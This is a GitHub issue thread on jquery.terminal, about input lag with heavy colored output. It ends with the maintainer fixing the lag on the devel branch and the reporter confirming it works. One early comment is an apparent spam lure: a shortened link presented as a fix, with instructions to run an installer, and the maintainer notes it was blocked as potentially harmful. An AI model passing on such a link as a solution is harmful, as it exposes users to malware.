### ISSUE TITLE
Holding key when typing input exhausts render time

### ISSUE THREAD

**Issue by ordo-n** [jcubic/jquery.terminal#961] opened 2024-09-02 23:18 UTC
### Issue summary
Holding down the "a" key to input "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".... gets progressively slow the longer you hold it down. This is compounded by the more colored text is displayed in the terminal. It slows down dramatically to the point of freezing. I have tested this on several systems fast and slow. The render time in the dev tools is where the lag occurred.

### Expected behavior
It should not use so much render time simply to insert characters into the input or when removing characters.

### Actual behavior
Very slow, very laggy, freezes

### Steps to reproduce
Print colored text to the terminal, the more that's printed the worse it gets
Then hold down the "a" key to insert "aaaaaaaaaaaaaaaa".. into the input and then hold backspace to delete. Both insert and backspace lag.

### Browser and OS
Edge, Chrome,

### Additional notes

https://jsfiddle.net/p29yh7ja/

**Comment by maher-nakesh** [comment] 2024-09-02 23:18
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by jcubic** [comment] 2024-09-03 07:04
Warning: This URL has been blocked by Bitly's systems as potentially harmful.

> try this
> https://bit.ly/4e4zLlq
> select the desired compiler in the installer
> 


--
Jakub T. Jankiewicz, Senior Front-End Developer
https://jcubic.pl/me
https://lips.js.org
https://koduj.org

**Comment by ordo-n** [comment] 2024-09-03 11:38
I am limiting with outputLimit: 750

But due to my use of color the lag becomes apparent as soon as it reaches that limit.

The only way to be lag free is to use outputLimit: 200 (not enough for my use case) or remove color entirely.

Are there any ideas for reducing render time? should the input really re-render the whole terminal (doesn't that seem unnecessary?)

**Comment by ordo-n** [comment] 2024-09-03 12:02
Before I go ahead and make changes, would using colored spans instead of the inbuilt coloring increase performance?

**Comment by ordo-n** [comment] 2024-09-03 13:27
Using colored spans with raw:true instead of the inbuilt coloring works to reduce the lag quite alot!

**Comment by jcubic** [comment] 2024-09-03 15:44
Do I understand the issue correctly: when you type `test` into fiddle terminal and hold the key, it freezes? This is not the same as holding a key as you description suggest.

**Comment by jcubic** [comment] 2024-09-03 15:47
This is really weird, because command line is a different component (jQuery plugin), so what's on the terminal should not affect the interaction with the Command Line.

I need to investigate. Thanks for reporting.

**Comment by jcubic** [comment] 2024-09-03 16:12
I did a quick check and what you have is the limitation of the Browser. There are simply way too many DOM nodes on the page. The insert of the character trigger reflow of the whole page. Check this code that use `{ raw: true }` and inserts single and double span 

https://codepen.io/jcubic/pen/JjQmqQM

I'm not sure if I can do something about this to not break the library. But maybe something you can do to limit the reflow of the whole page. The performance Tool in Google Chrome says that this a bottleneck even with a single span.

**Comment by jcubic** [comment] 2024-09-03 16:31
[contain CSS property](https://developer.mozilla.org/en-US/docs/Web/CSS/contain) didn't help. I think that I will need to close this bug. The only thing I can think of that will improve performance is to use Virtual Output. Technique used by [React-Window](https://github.com/bvaughn/react-window), but this will be a big task to create a feature like this. And this would be tracked as a separate feature. Maybe even for version 3.0 if it will ever happen.

Unless you have other idea how to improve performance.

**Comment by ordo-n** [comment] 2024-09-04 11:39
I do not have any other ideas on how to improve the performance as I do not know the code base well enough. The Virtual Output would be beneficial, any performance increase for the browser will help for my use case.

jQuery Terminal is an integral part of my project (the whole site is built around it). Anything that can be done to improve the performance would be welcomed as the browser does seem to struggle with use.

It's up to you, if you want to come back to this at a later date or close the issue do as you will I do not mind you are in charge.

Thank you for looking into this.

**Comment by jcubic** [comment] 2024-09-04 13:52
Before the virtual window is implemented, you can try using `outputLimit: 0` option. It will only display as many lines as there are on the screen, no scrollbar.

**Comment by jcubic** [comment] 2024-09-04 18:43
The issue is fixed on a devel branch and will be included in next release.

**Comment by ordo-n** [comment] 2024-09-04 19:14
Brilliant news! I'm eager to test the developer branch. I haven't built the project from scratch yet. I do npm install but then the expected function npm run build doesnt appear to exist. Advise please.

**Comment by jcubic** [comment] 2024-09-04 20:44
The project use make not npm to build files, but you don't need to build anything. Just clone the repo and change the branch, build files are part of the repo. If you use CDN for your project you don't even need to clone the repo. You can just grab files directly from github 

```html
<script src="https://cdn.jsdelivr.net/gh/jcubic/jquery.terminal@devel/js/jquery.terminal.min.js"></script>
```

**Comment by ordo-n** [comment] 2024-09-05 23:16
can confirm it works perfectly

**Closed** 2024-09-07 20:53 UTC
Labels: Bug, resolved
